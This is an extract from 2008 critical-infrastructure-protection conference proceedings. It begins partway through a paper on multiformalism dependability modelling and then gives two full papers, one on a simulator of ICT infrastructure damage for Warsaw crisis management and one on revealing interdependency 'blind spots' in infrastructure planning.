341
CI K
OP (N-1).K
Fig. 2. Inter-infrastructure model composition
a failure. Another aspect which needs to be highlighted is that input/output interface layers are not separated in vertical layers. This allows for any interaction with internal models; e.g. a limited capacity of some external infrastructures could influence internal capacity as well as the possibility of performing recovery interventions (imagine the scenario of a blocked highway preventing repair teams from reaching remote sites of a failed railway infrastructure). In the general scheme, models can be substituted by simplified versions (e.g. “stubs”) in a first approximation, thus following a step-wise refinement strategy (possibly result-driven) starting from basic (i.e. more abstract) models. In Fig. 2 it is reported the basic interconnection scheme for the integration of intra-infrastructure models in order to perform interdependence analyses. Since such a view is at a higher hierarchical level, CI are simply represented by blocks, which results in an easy to read representation. The interconnection is performed by means of composition operators (OP), which can allow for bidirectional flows (input/output). For submodels which are not already available, the choice of modeling formalism is an important issue. Some of the most widespread modeling formalisms have been surveyed in Section 2. In the same section we have also pointed out that the integration between failure and performance models of the same system into a single cohesive model is known as performability. Many performability models are based on various forms of Stochastic Petri Nets (e.g. GSPN). A basic example is reported in Fig. 3a. The upper part models a queue, while the bottom represents a two state CTMC. The model assumes a single internal failure mode and a single service provided. In case of more failure modes, the CTMC must include more states, while more queues should be modeled when more services are provided. In multiformalism approaches, performance and dependability models are kept separated. Fig. 3b reports an example multiformalism performability model of a critical infrastructure considering: – Queuing Networks for the Internal Capacity Model; – Continuous Time Markov Chains for the Internal Recovery Model; – Bayesian Networks for the Internal Failure Model.
342
F. Flammini et al.
CAPACITY MODEL l
SERVICE
QUEUE
m
CAPACITY MODEL (
QN )
1/MTBF RECOVERY MODEL (
CTMC )
UNAVAILABLE
AVAILABLE
1/MTTR FAILURE & RECOVERY MODEL
(a)
FAILURE MODEL ( BN )
(b)
Fig. 3. Basic performability models using (a) GSPN or (b) multiformalism (QN+CTMC+BN)
In general, a “performability module” is needed for each service provided, considering each significant (failure - recovery strategy) pair. The use of BN allows considering more failure modes and both random faults and security threats, e.g. strategic disruptive attacks possibly involving more than one infrastructure and obtained by simultaneous exploitation of flaws. Referring to Fig. 3b, upward connections are required to model: – BN→ CTMC: effect of failures on the infrastructure operating modes (e.g. full operational, minor failure, service failure, immobilizing failure, etc.); – CTMC→ QN: effect of the operating mode on infrastructure capacity (e.g. reduction by X%). Downward connections are instead required to account for: – QN→ CTMC: infrastructure overstress (obtained by reporting the effect of server occupation to the lower layer); – CTMC→ BN: imperfect recovery (propagation of repair faults to the failure model) and overstress (increase of the Mean Time Between Failures, MTBF). Multiformalism performability model interconnection is possible by superposition of QN belonging to different infrastructure models, according to service dependence. Once instantiated and interconnected the models of all infrastructures, quantitative attributes of the overall multiformalism model can be evaluated in the OsMoSys framework using a suitable solving process. For instance, the availability of a single infrastructure with respect to a certain failure mode can be evaluated considering the contribution of all other interacting infrastructures.
A Study on Multiformalism Modeling of Critical Infrastructures
4
343
Conclusions and Future Works
In this paper we have proposed a multiformalism approach to the modeling of CI, with the aim of integrating heterogeneous (existing) models and possibly providing analytic evaluation of dependability attributes. The preliminary study also shows that multiformalism approaches well fit multilevel hierarchical modeling paradigms. We are presently working on a complete case-study application of the methodology. The use of existing models could be limited by infrastructure operators for confidentiality reasons. To overcome this, models can be run in a distributed simulation environment only exposing their public interface, and the exchange of information to make them interact can be managed by the OsMoSys workflow engine.
References 1. de Lara, J., Guerra, E., Vangheluwe, H.: Meta-Modelling, Graph Transformation and Model Checking for the Analysis of Hybrid Systems. In: Pfaltz, J.L., Nagl, M., B¨ ohlen, B. (eds.) AGTIVE 2003. LNCS, vol. 3062, pp. 292–298. Springer, Heidelberg (2004) 2. Di Lorenzo, G., Flammini, F., Iacono, M., Marrone, S., Moscato, F., Vittorini, V.: The software architecture of the OsMoSys multisolution framework. In: Proc. 2nd Intl. Conf. on Perf. Evaluation Meth. & Tools, VALUETOOLS 2007, pp. 1–10 (2007) 3. Ezell, B., Farr, J., Wiese, I.: Infrastructure Risk Analysis Model. Journal of Infrastructure Systems 6(3), 114–117 (2000) 4. Flammini, F., Iacono, M., Marrone, S., Mazzocca, N.: Using Repairable Fault Trees for the evaluation of design choices for critical repairable systems. In: Proceedings of the 9th IEEE International Symposium on High Assurance Systems Engineering (HASE 2005), Heidelberg, Germany, pp. 163–172 (2005) 5. Flammini, F., Marrone, S., Mazzocca, N., Vittorini, V.: Modelling Structural Reliability Aspects of ERTMS/ETCS by Fault Trees and Bayesian Networks. In: Proc. of the European Safety & Reliability Conference, ESREL 2006 (2006) 6. G¨ ossler, G., Sifakis, J.: Composition for Component-Based Modeling. In: de Boer, F.S., Bonsangue, M.M., Graf, S., de Roever, W.-P. (eds.) FMCO 2002. LNCS, vol. 2852, pp. 443–466. Springer, Heidelberg (2003) 7. Mengting, Y., Chao, Y.: Model Checking Multi-agent Systems. In: Proc. of Intl. Conf. Service Systems and Service Management, pp. 1–5 (2007) 8. Meyer, J.F.: Performability: a retrospective and some pointers to the future. Performance Evaluation 14(3&4), 139–156 (1992) 9. Nicol, D.M., Sanders, W.H., Trivedi, K.S.: Model-based evaluation: from dependability to security. IEEE Transactions on Dependable and Secure Computing 1(1), 48–65 (2004) 10. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research, INL Technical Document: INL/EXT-06-11464 (2006) 11. Sanders, W.H.: Integrated Frameworks for Multi-Level and Multi-Formalism Modeling. In: Proc. of the 8th Intl. Workshop on Petri Nets and Performance Models, p. 2 (1999)
Simulation of Critical ICT Infrastructure for Municipal Crisis Management Adam Kozakiewicz, Anna Felkner, and Tomasz Jordan Kruk NASK – Research and Academic Computer Network Wawozowa 18, 02-796 Warsaw, Poland Institute of Control and Computation Engineering Warsaw University of Technology Nowowiejska 15/19, 00-665 Warsaw, Poland Abstract. Crisis management benefits tremendously from simulation, especially during the planning and testing. At the same time an often overlooked aspect of crisis management is the key role of telecommunication. This paper describes the work done at NASK with the goal of implementing a simulator of the consequences of threats to the ICT (Information and Communication Technology) infrastructure, as a part of a large simulation environment for crisis management in a large urban area (specifically the Warsaw agglomeration).
1
Project Background
Simulation is a very useful tool for crisis management. It can be used in the planning phase, to make sure that the proposed actions will be effective. In the training phase it can help verify the ability of decision makers to control disaster response. Finally, during an actual crisis, it acts as a visualization tool for the observed threats, a prediction mechanism suggesting probable development of the crisis and a testing environment enabling comparison of different strategies. In response to this need, a consortium of Polish research institutes was formed to research the crisis management problems, including preparation of a multiaspect simulation environment for the Warsaw agglomeration. The simulation should include all kinds of threats: fires, floods, chemical or nuclear pollution, terrorism, military threats, etc. Institutes from respective fields were invited and work started as a research grant from the Ministry of Science and Higher Education “Models of threats to agglomeration and crisis management system – case study for the Capital City of Warsaw”, coordinated by the Military University of Technology in Warsaw. NASK, together with the National Institute of Telecommunications, was tasked with researching the often overlooked problem of critical ICT (Information and Communication Infrastructure) infrastructure. It is far too often assumed, that e.g. communication between the command and units will be available during crisis. Even if this aspect could be safely ignored, a modern city cannot function properly if its telecommunication infrastructure is badly damaged, or if systems used in everyday functioning of the municipal administration are offline – such outages generate costs and make restoring normal situation after a crisis more complicated. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 344–351, 2009. c Springer-Verlag Berlin Heidelberg 2009
Simulation of Critical ICT Infrastructure for Municipal Crisis Management
345
While usually less important than direct threats to human lives, these problems should not be completely ignored. One of the tasks handled by NASK was to prepare a concept of a simulator of the consequences of threats to the ICT infrastructure. This paper will present an overview of the results. Observations forming the basis for the project were made in Warsaw, but the same comments hold more or less true for many cities. The goal of the project was to build adaptable tools, which could be used in any city after minor changes and of course with new data.
2
Problem Description
The main task of the simulation is to identify the consequences of damage to ICT infrastructure by different threats. The problem is simplified by the fact that the cause of damages is not really important – whether a router burned in a fire, or sank during the flood, does not change the basic fact that the router is down and alternative routes must be found. For this reason, the input from other parts of the multi-simulator includes only basic information about threats, mostly limited to the coordinates of the endangered area. Unfortunately, the ICT sector is often completely overlooked in the crisis management. The consequences of damages to this infrastructure are not considered critical for the functioning of a city. At the same time, administration of the most important parts of this infrastructure is often fragmented, with little or no coordination between operators. In one example two operators were selected to provide a link between two points, with load distributed between the two connections. In theory this provides redundancy, enabling a degraded but uninterrupted service in case of a failure in one of the networks. In practice, the client was unable to find out that both providers use fibers in the same duct. Many networks are built ad hoc, using questionable engineering practices. At the same time more and more important services are required. The cost of building a full-scale dedicated network is rather prohibitive, when sufficient capacity can be provided by existing commercial operators, unfortunately not very interested in coordinated disaster prevention. Such outsourcing makes sense in a business setting, but for some administrative tasks in a municipality a better level of preparation for potential disasters is usually expected. In effect the infrastructure is quite vulnerable to all kinds of physical threats. This situation could be made better by collecting the available information and testing the infrastructure through extensive simulation to locate weak spots. This approach would be useful both for the city as a network user and the commercial providers. Note, that while on the state level the ICT infrastructure is already considered crucial (see e.g. [1], [2]), on the municipal level this belief is not as widespread. The ICT infrastructure of an agglomeration consists of cables, network nodes (routers, switches), wireless antennae, computers, etc., as well as information systems actually provided by the computers. To deal with that, we assume that unimportant information, e.g. details about local networks in less critical institutions, should not be entered into the system. The rest of the information,
346
A. Kozakiewicz, A. Felkner, and T.J. Kruk
potentially useful, is further prioritized by means of a ”criticality factor”, which enables us to differentiate critical systems and links from those, whose functioning during a crisis is only preferred, and the rest, not important enough to warrant extra attention during an emergency. Of course, this factor is not as simple as it might seem: for example, a low-speed backup link, basically useless, becomes critical if it is on the only functioning route between two critical systems which need to communicate to function. The above paragraphs present all the elements that must be incorporated in the design of a threat consequences simulator for ICT infrastructure: – a database of the city’s most important computers, networks and communications equipment, of the important systems running on this infrastructure and key relationships between all elements, – identification of critical elements of the infrastructure, – collecting information about external threats, – computing the effects of these threats on the graph of the network, focusing on the critical elements. All of these aspects are included in the presented solution. Note that only physical threats are mentioned. In fact, there is also a different kind of threat to the ICT infrastructure – internal threats, such as malware. This aspect was also analyzed as a part of this project. In this paper, however, we will focus on the external threat consequences simulator.
3
System Architecture
The simulator is not a standalone tool. It was designed to be used as a part of the multi-threat simulator, communicating with others and using the system’s main GUI as its user interface. Due to the well specified interfaces, this does not preclude integrating it in other products or even transforming it into a standalone application by implementing a simple user interface. This fact enforces several design decisions. First of all, due to the specification of the multi-simulator, the interface of the ICT simulator is specified as web services. This corresponds well to the selected approach to feature specification, which focuses on use scenarios. The scenarios can be the basis for API specification. The other important feature of the multi-simulator is its user interface, based on a digital map of the city. This digital map is not only the interface, but also an important source of data for individual simulators. It is assumed that the ICT simulator will in fact hold all the data necessary for its functioning locally (for efficiency reasons), but a large part of that data is actually supplied by the map software at the start of a new simulation. Some kinds of information may be too task-specific to be stored in the central system, so the design is a hybrid one. A positive side effect is that the simulator can actually function very well without the digital map module, if all necessary data can be loaded in a different way. The use scenarios, described later, require that the database must store (and collect from the digital map, if it is possible) the following data:
Simulation of Critical ICT Infrastructure for Municipal Crisis Management
347
– – – – – – – –
the network topology, positions of nodes and links in the network, positions of essential systems, which provide services, ranges of wireless communications, criticality levels, connections between nodes and links, defining the topology of the system, software and services – depending on relevance of offered services, tunnels – definitions of pairs of objects which need to communicate (in any manner), defined when the connectivity between those objects is itself critical, but the route is not, – dependencies (whether one object is necessary for the functioning of another). A database for this task has already been designed and, with the use scenarios and algorithms resulting from them, forms the engine of the simulator. The basic structure of the database is presented in Fig. 1. Note that the table names were actually translated into English for this paper. Simulation management tables
simulation
Object type-specific information
simulation_has_states
type_1_services
type_2_software simulation_logs
state
simulator_logs
state_has_objects
type_3_hardware
type_4_link
type_5_network
relation
object
type_6_institution
type_7_threat
coordinates
location
type_8_group
Fig. 1. Structure of the database for the ICT simulator
The properties of hardware and software components are stored in the database prepared for this project. The components are described as generic objects, with type-specific information stored separately. Objects may have defined locations. In case of node hardware (computers, switches, etc.) these are simply coordinates, while links are defined as ellipsoids. The reason for this was that precise location of links can in many cases be difficult to obtain – this was a big problem in the preparatory phase of the project. The ellipsoids allow at least estimation of probability of a link being damaged by a disaster near its estimated path. The tables defined for storing locations are also used to hold wireless ranges.
348
A. Kozakiewicz, A. Felkner, and T.J. Kruk
The objects in the database are organized using object groups. The basic role of a group is to define sets of objects which are important as a whole, but there is also a special kind of group used to store the tunnels mentioned above. All groups are bound together by a special kind of relation, described later. The defined kinds of groups are as follows: – If all elements of group are essential in implementation of key assignments, systems can be joined into complementary groups. It ought to be accepted that the criticality of elements of the group is at least equal to the criticality of the entire group. If this is not given, the criticality is equal to criticality of the most critical element. – Systems, but also links and nodes, can be joined into replacement groups, most often into pairs. In such case the criticality of the group is equal to the lowest criticality among its elements. This type of groups has an additional property – the maximum switching time, which determines how long the resource can be completely unavailable after the basic resource malfunction. – A tunnel group can be assembled from pairs of resources, which need to have a connection assured. This connection can be provided in any manner. Such a tunnel has it’s own criticality, not related to the criticality of the connected objects (but usually not higher than the lowest of those). All groups are themselves objects, so they can be members of other groups as well. This property can be used to create complex groups, for example if the service can be provided by two different resources kits, it can be described as a replacement group, consisting of two complementary groups. As it was mentioned before, the groups are defined by a relation. There are more types of relations: – A topological relation stores the connections between nodes and links, defining the structure of the network as a graph. – A dependency relation stores the dependencies between objects. – An inclusion relation is used to assign members to groups. All of these relations are practically the same from the point of view of the database. The objects (several types, including groups), their type-specific counterparts, location information and relations are the main part of the database. Other tables are necessary from the simulation point of view and are used to describe the passage of time and to store simulation run-specific information.
4
Use Scenarios
Use scenarios are the most important part of the functional specification. They are meant to be an exhaustive list of questions and tasks for the simulator. It is of course possible, that new scenarios will be added in the future, but the currently planned list is sufficient for the functioning of the system.
Simulation of Critical ICT Infrastructure for Municipal Crisis Management
349
The scenarios were generated during several months of discussions, starting early in the preparation phase of the project. In the design phase they are converted into actual algorithms, with common parts extracted into separate sub-algorithms. These algorithms will then be assigned to web services and implemented. Since the team took care to specify the scenarios such that they are implementable, in most cases a general idea of an algorithm is already present and is simply being formally specified. New algorithms may be proposed if the original ideas prove inefficient. Scenarios which should be accomplished by the simulator were divided into five groups: helper scenarios, simple scenarios, location scenarios, graph and group scenarios, and variant scenarios. These groups are listed in the following sections. 4.1
Helper Scenarios
Helper scenarios do not perform any simulations. They are used only for preparation to future simulations. This group includes the following scenarios: – Modify (add/remove/change) the object/list of objects (types: the service, software, network devices, link, network, institution). – Connect network devices with a link. – Modify the system (system is a network device, software, services and relations between them). – Modify the group. – Add object(s) to the group. – Add/remove relation. – Change the criticality of the object. Criticality of the resource should be understood as the enlargement of the importance (ranks) of the resource against other resources. – Move the network devices with all bindings. – Define the new threat area and give it a name. – Change the range of named threat. Scenario enables to modify earlier defined area; changes can be: • redefinition: given new shape of the area, • additive modification: given new subareas to add (or remove), • morphing modification: given a list of changes of subareas coordinates, • deletion: eliminating existing threat. 4.2
Simple Scenarios
The scenarios in this group do not demand any calculations and are used for data output from the system: – What is the inherent criticality of the object? Scenario is used to show what criticality is assigned to the resource or group directly in its database record. – Which connections are essential to realize a crisis management procedure? Scenario determines a procedure’s requirements. A procedure, from the point of view of the simulator, is basically just a group of systems, tunnels and links, without which the communication and management specified in the official procedure cannot be assured.
350
4.3
A. Kozakiewicz, A. Felkner, and T.J. Kruk
Location Scenarios
These scenarios check if nodes and systems belong to a static threat area: – Which critical resources are threatened? – Which critical resources are available despite the threat? Scenario is especially useful if the disaster causes a total collapse of the ICT system, when the list of operational system is actually much shorter than the list of damages. – Is the resource/area vulnerable to threat? 4.4
Group and Graph Scenarios
In these scenarios the topology of the network has to be analyzed, which includes finding paths and processing the structure of the network. Note, that the scenarios concerning groups can also be used to ask about groups to which a given resource belongs. The group includes the following scenarios: – What is the static level of the criticality of the resource/object? – What is the level of the criticality of a group? These two scenarios determine the pessimistic estimation of the resource significance, taking into account its role in groups. – How critical is the resource/area? – What is the criticality of elements of the group? – Which resources are critical at the moment? Scenario identifies (in the whole system or in a given area) resources, with criticality above a given threshold. – Is the connection between two points/nodes possible? – Is the realization of given crisis management procedure possible (or realization of another group)? – Does a given service work? – What localization does the service have? – Is the given service available from a certain point? – Which crisis management procedures are possible/impossible to carry out in the current situation? – Find a functioning path between two given points. 4.5
Variant Scenarios
This group of scenarios has to take into consideration the system state in at least two different simulation states and compare these states. The following scenarios belong to this group: – What consequences for connectivity would occur if a resource (or list of resources) was repaired/damaged in the context of existing threats? – What consequences for criticality of resources would occur if a resource (or list of resources) was repaired/damaged in the context of existing threats? – Which resources should be protected during the changing crisis situation? – Prioritize the repair/replacement of damaged resources.
Simulation of Critical ICT Infrastructure for Municipal Crisis Management
5
351
Further Development
The ICT threat consequences simulator is already past the basic design phase. The original project only included a concept of a simulator, but the authors continue with the development and the implementation will be completed. After analysis of the documents made available by the potential users ([3], [4], [5], [7], later [6] and others) the functional specification for the project is already complete. The technical specification is also quite advanced – the architecture, database structure, choice of tools, etc. are completed, the only unfinished element of the specification is the design of some of the algorithms implementing the use scenarios. Until these are ready, the specification of web services is also considered volatile. As soon as this phase is completed, implementation will start.
References 1. Blattner, M.: Quo vadis? IT security as common task of state and economy. ECN European CIIP Newsletter 4(1), 10–13 (2008) 2. Narich, R.: Protection of Critical Infrastructure: Importance, Complexity, Results. ECN European CIIP Newsletter 2(1), 7–9 (2006) 3. Wewnetrzny Regulamin Dzialania Biura Bezpiecze´ nstwa i Zarzadzania Kryzysowego m. st. Warszawy an operational statute (2005) 4. Plan Reagowania Kryzysowego m. st. Warszawy, incomplete draft a disaster response plan (2006) 5. Tymczasowy Regulamin Organizacyjny Urzedu Miasta Sto lecznego Warszawy an organizational statute (2006) 6. Regulamin Organizacyjny Urzedu Miasta Sto lecznego Warszawy an organizational statute (2007) 7. Regulamin bie˙zacych prac Zespolu Reagowania Kryzysowego m. st. Warszawy oraz dziala´ n w sytuacjach zagro˙ze´ n katastrofa naturalna lub awaria techniczna noszac a znamiona kleski z˙ ywiolowej a lower-level operational statute and disaster response plan (2004)
An Ontology-Based Approach to Blind Spot Revelation in Critical Infrastructure Protection Planning Joshua Blackwell, William J. Tolone, Seok-Won Lee, Wei-Ning Xiang, and Lydia Marsh The University of North Carolina at Charlotte, 9201 University City Blvd, Charlotte, NC 28223-0001, USA
Abstract. One widely perceived yet poorly understood phenomenon in the practice of critical infrastructure protection is that of blind spots. These are certain aspects of the interrelationships among different critical infrastructure systems (CI systems) that could trigger catastrophe across CI systems but are concealed from planners, and discovered only in the aftermath of a crisis. In this paper, we discuss the sources of blind spots, and explore the feasibility of various techniques to help reveal blind spots.
1
Introduction
August 14th, 2003 saw the Northeastern blackout, a massive power blackout in the northeastern United States and southeastern Canada. The cascading events that resulted in failures in other infrastructure systems-telecommunication services, aviation, and transit-affected the lives of over 50 million people in both countries [6,7]. The cause of the blackout, revealed only in hindsight, is a surprise that goes beyond anyone’s imagination. It was a trivial incidence in Parma, Ohio, a suburb of Cleveland, where untrimmed overgrown trees severed one section of a high-voltage power transmission line [6,7]. Surprises of this kind and resulting failures are manifestations of blind spots, a widely perceived yet poorly understood phenomenon in the practice of critical infrastructure protection (CIP, hereafter). In this paper, we explore a set of questions instrumental to the revelation of blind spots. That is, what exactly is a blind spot in CIP? Where does it come from? What impacts does it have on the CIP practice? To what extent, if ever, can a blind spot be revealed or even projected before a crisis? What role(s) can information technology play in revealing blind spots? We propose the use of information technologies to facilitate explorations of the blind spots.
2
What Is a Blind Spot?
One useful analogy can be drawn between a car driver and a CIP planner. A blind spot is the area the driver cannot see through the mirrors. As shown in R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 352–359, 2009. c Springer-Verlag Berlin Heidelberg 2009
An Ontology-Based Approach to Blind Spot Revelation
353
Fig. 1. A driver’s blind spot [1]
Figure 1, there are two areas in a driver’s field of vision that are not visible. If the driver was to turn and look at the side, the blind spot would be revealed to him/her, and more importantly, whatever is in the blind spot, perhaps another vehicle, will be noticed and avoided if deemed dangerous. Another type of blind spot exists in the forward vision as well. Perceptual or cognitive blind spots occur in the forward vision when drivers become used to seeing things more often than not. Their focus of attention and cognitive thought process prevent them from recognizing potential dangers in plain sight. For example, the driver may fail to brake quickly enough to avoid collision due to poor depth perception. This aspect is not depicted in the illustration but must be recognized. Similarly, in CIP planning, blind spots refer to certain aspects of the interrelationships among different critical infrastructures (CI systems, hereafter) that could trigger catastrophe across CI systems but are concealed from CIP planners, and discovered only in the aftermath of a crisis. The 2003 blackout is one of many examples of blind spots. Yet, not all of the interrelationships among CI systems are blind spots. In a recent study, McNally et. al. [9] examined the interrelationships among different CI systems (that is, CI interdependencies) under a quadruple framework. This study demonstrates an asymmetry in the accumulated knowledge about, and attention toward, CI interdependencies across the four quadrants of their framework. More specifically, (1) knowledge is generally available about CI interdependencies among CI systems that are directly connected by functional and geographically proximate to one another (quadrant A); (2) little attention has been paid to the CI interdependencies among CI systems indirectly connected by function regardless of their geographic location, i.e., proximate or distant (quadrants B and C); (3) although knowledge is readily available about CI interdependencies among CI systems that are directly connected by function but geographically distant (quadrant D), the segmented nature of CI service delivery often constitutes a ”corporate firewall” that prevents knowledge exchange and communications across different CI systems about potential vulnerabilities caused by the CI interdependencies in other quadrants (that is, A, B, and C). Clearly, under this quadruple framework, CI interdependencies in quadrants B and C are more likely to become
354
J. Blackwell et al.
blind spots than those in quadrant D, and especially those in quadrant A. In the next section, we extend the work of McNally et. al. to the explore of sources of blind spots in CIP. That is, where do blind spots come from?
3
Sources of Blind Spots in CIP
Among possible sources of blind spots in the practice of critical infrastructure protection are complexity; imperfections in information, heuristics, and tools; and the lack of cross-domain knowledge. 3.1
Complexity of CI Systems
Complexity in CI systems stems from at least three sources: CI interdependencies, spatial and temporal variations and scale dependence of observation. Characterized by McNally et. al.’s four quadrant framework, CI interdependencies amongst CI objects can be span CI systems, i.e., inter-domain dependencies, or occur within CI systems, i.e., intra-domain dependencies. CI interdependencies can also be spatially proximate or distant. Furthermore, there are emergent features that arise when looking at a system of CIs that are not present when examining an individual CI system [9]. For example HVAC systems depend on electric power to provide cooling; if power is lost then although HVAC systems are sound, they no longer can operate. Though a simple example, this effect is only recognized with a system of systems perspective. Given the complexity of a system of CIs and the general awareness CI interdependencies as reported by McNally et. al., it is unlikely for a CIP Planner to understand properly all relevant CI interdependencies. Furthermore, spatial and temporal variations occur among CI systems. CI systems are located, in part, based on natural and unique environmental characteristics, which impacts CI interdependencies. Therefore, our understanding CI interdependencies is not necessarily transferrable from one region to the next. In addition, our understanding may also be temporally dependent as CI behavior, and the subsequent interdependencies, can change over time (e.g., time of day, time of year, etc.) Scale dependence of observation refers to the level of detail represented. Due to their inherent complexity, CI systems are often examined or observed at various scales analysis. CI interdependencies are naturally associated with these scales of analysis. Examining CI systems at a particular scale necessarily obscures both detail and context. Furthermore, our understanding of CI interdependencies is scale dependent - i.e., assessing geographic proximity depends on scale; assessing direct v. indirect functional dependence also depends on scale. Consequently, macro-scale and micro-scale CI interdependencies can be occluded due to the scale of observation. Likewise, CI interdependencies may be misunderstood due to the scale of observation.
An Ontology-Based Approach to Blind Spot Revelation
3.2
355
Imperfect Information
Much of the information needed for CIP planning is not within the public domain. It is estimated that 85 percent of all CI data in the U.S is maintained by the private sector. Owing to their confidential, proprietary and business sensitive nature, these data are not accessible to the public [10]. In the United States, the Protected Critical Infrastructure Program under the U.S. Department of Homeland Security, with provisions from the Critical Infrastructure Information Act, only encourages private sector data sources to submit information/knowledge/data voluntarily to the U.S. federal government. Nevertheless, even if the U.S. were to comply, the data are often large, extensive, even entrapping [11]. 3.3
Imperfect Heuristics
Human thinking is affected by two common effects that set limits on our cognitive abilities. These affects can be a source of blind spots. The availability heuristic occurs when a human uses the most available pieces of information to assess the frequency of an object class or the probability of an event [13]. Salience also contributes to minds ability to retrieve available information. If one was to witness an event rather than just hear about it, one is more likely to remember and retrieve that as a process that occurs [13]. People are also biased when it comes to assessing situations they have not seen before. Their bias of imaginability leads them to generate an answer according to some rule if there are no known instances to reference [13]. Risk can be evaluated incorrectly or not seen if a person cannot fathom the type of risk that exists in a situation given the rules that the person already has in place. People start from a value point that is known and then adjust it to meet the situation being evaluated. However, the result is always tied to the initial value point. This is known as the anchoring effect [13]. When the adjustment from this value point is not sufficient to lead to an accurate conclusion of the events or objects in question, a misconception is left and an error can occur [13]. It is important to understand the limitations of these heuristics so that judgment and decision making in critical situations can improve. 3.4
Imperfect Tools
Modelers of CI systems should consider the capabilities and limitations of the tools that they use to understand CI systems. Often, it is possible for tools to under represent or even worse misrepresent critical information necessary to understand real world CI phenomena. For example a geographic information system is capable of displaying CI systems in visual displays with colors to represent functionality and type. It can easily display spatial proximity as different scales of observation. However it cannot easily display the functional connectedness or nature of the functional relationships amongst those objects. On the other hand, ontological modeling tools, that can easily represent functional relationships, do not effectively depict spatial proximity.
356
3.5
J. Blackwell et al.
Lack of Cross-Domain Knowledge
As society and its organizations become more specialized, human knowledge tends to be more domain-specific. People who have cross-domain knowledge are usually are in senior positions and less accessible. This is especially the case in organizations that operate and/or manage CI systems due to the security and business-sensitivity concerns in the arena of CIP. The shortage of subject matter experts with cross-domain knowledge further contributes to the problem of blind spots. It should be noted that the above discussion of possible sources of blind spots in CIP is by no means inclusive. An in-depth investigation that systematically studies the phenomena is beyond the scope of this paper. However, in the next section we discuss the potential role of information technology and modeling in revealing blind spots.
4
Information Technologies, Modeling and Blind Spot Revelation
It is well established that driver blind spots can be revealed by adjusting the rear-view mirrors or incorporating additional mirrors as well as the protocol of ”looking back over your shoulder”. In CIP planning, we claim that blind spots can be revealed through the innovative use of information technology, modeling, and associated operational protocols. In this section, we highlight several general approaches to blind spot revelation that demonstrate potential promise. To facilitate blind spot revelation, it is necessary to articulate various methods and tools together under an overarching framework. We propose a spatial decision support system (SDSS) to serve the purpose. More specifically, by combining the strength of an ontology-based knowledge engine and GIS, crossdomain knowledge solicited from human experts [11] can be represented, visualized, and further applied to reasoning and modeling; by coupling several methods in a model base, the SDSS provides CIP planners with tools in revealing blind spots and preparing for disaster management. Briefly discussed below are these methods. 4.1
Abstraction
Abstraction can be used to assist in blind spot revelation. In order for CIP Planners to understand further the sources of blind spots within their CI systems it is necessary to assess their CI systems from different levels of abstraction [8,16]. This will promote a learning cycle in which domain assessment leads to an enrichment of the domain data, which, in turn, will necessitate further domain assessment. Through abstraction methods enabled by a SDSS, Planners will better understand where the sources of blind spots originate and determine if the blind spots are located under the planner’s control or outside the planners control in a larger world domain.
An Ontology-Based Approach to Blind Spot Revelation
4.2
357
CI System Specification
McNally et. al. [9] describe a method for the specification of individual CI systems as well as a system of CIs. A system of CIs is a collective group of CI systems that provides commodities integral to maintaining normal operations for a given region. There are four iterative steps to this method for CI system specification. (1) Identify the CI systems: identify the CIs, their boundaries and structures. (2) Specify the CI systems: place all CI objects into the model. Identify and specify properties and characteristics of each object in the model. Specify inherent functionalities and model relationships between objects in the same system (intra-domain interdependencies). (3) Specify the system of CIs: define crossdomain interdependencies amongst objects from different CI systems. (4) Verification and Validation: evaluate and refine the model to direct future iterations of these steps. Integrating into a SDSS support for such methods can facilitate the discovery of blinds spots by CIP Planners. 4.3
Scenarios
Scenarios, potentially built based on data and knowledge included in a SDSS, can be used to reveal blind spots. Scenarios can demonstrate how over time interdependencies amongst CI systems and systems of CIs can change. Each scenario connects an initial state and initiating event(s), to desired and undesired end states (different levels of damage), with a sequence of events linking the two. When modeling, the scenarist compiles information together into chunks. Then, the scenarist can bring these chunks together with other experts to form larger pieces of information (larger chunks) that can potentially lead to goals or plans. In this way, a scenario functions as a bridge to connect the communities of modeling and planning [17]. Thus, scenarios can expand knowledge. While scenarios can be designed from a vulnerability or risk assessment mindset, they also can be designed from a red team mindset [9,12]. ”Red Team” has been used by the Department of Homeland Security (DHS) and the Institute for Defense Analyses Advanced War Fighting Program to describe the creation of a scenario from the mindset of the enemy [4,9,12]. This is much like Altshuller’s theory of inventive problem solving in which the scenario composer develops a state of mind rather just composing scenarios for risk assessment [3]. 4.4
Verification and Validation
To refine the model and enrich the knowledge base, we employ techniques that reveal blind spots as well as methods to verify and validate those blind spots. Verification asks if a model behaves according to its specification. Validation asks if model behavior reflects the represented phenomenon. By verifying and validating CI models better information and understanding is gained, and blind spots are revealed. Case-based verification, face validation and Delphi questioning have
358
J. Blackwell et al.
been used to verify and validate critical infrastructure models [15]. Case-based verification compares actual events to modeled events to assess model accuracy. It allows us to reflect upon how well the model represents the real world. Face validation asks experts to look at the model as a whole, including data representation, and offer their opinion as to the accuracy of representation. Delphi questioning asks subject matter experts a series of questions designed to elaborate on the data quality and representative accuracy. Each of these three techniques is used continually to refine the knowledge base in search of blind spots.
5
Conclusions
The sources of blind spots in CIP are potentially endless. A SDSS can incorporate known data/knowledge into a model base which visualizes the CI data/knowledge. Sources of blind spot can be investigated using modeling techniques as we have described. These different tools and techniques will allow the planner to assess and resolve vulnerabilities thereby circumventing potential emergencies. In addition, the planner can develop response plans for emergencies within their domain that can minimize the cascading effects. Future research should investigate interoperability amongst different CI Planners domain ontologies using common semantics [2]. Also, consistency constraints should be developed to help the planners understand how to make ontologies with similar descriptions of objects and properties in order to standardize the process and resulting datasets [5]. While conducting and applying this research, many observers became interested in what the resulting CI models were demonstrating. It is interesting that at this time many facilities managers and industrialists are examining ways to manage their systems. Our research draws attention to the details for which they are responsible and offers a new way of thinking about their systems. CIP is an expanding field that will continue to highlight potential dangerous issues in need of planning.
